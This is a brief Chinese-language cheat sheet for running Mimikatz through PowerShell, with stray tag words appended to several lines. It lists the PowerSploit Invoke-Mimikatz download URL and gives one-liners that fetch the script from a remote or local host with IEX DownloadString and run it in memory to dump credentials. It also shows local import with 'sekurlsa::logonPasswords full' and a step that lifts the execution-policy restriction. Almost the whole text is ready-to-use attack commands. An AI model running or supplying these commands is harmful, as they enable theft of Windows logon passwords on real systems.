(1)Invoke-Mimikatz.ps1下載地址git
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1github
(2)具有網絡環境直接執行命令shell
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"網絡
(3)本地網絡環境ide
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/');Invoke-Mimikatz -DumpCreds"url
(4)下載本地執行debug
一句話執行:rest
powershell Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'it
有受權限制的:io
Get-ExecutionPolicy //結果顯示restricted
Set-ExecutionPolicy Unrestricted //打開限制
Import-Module .\Invoke-Mimikatz.ps1 //導入命令
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"' //獲取密碼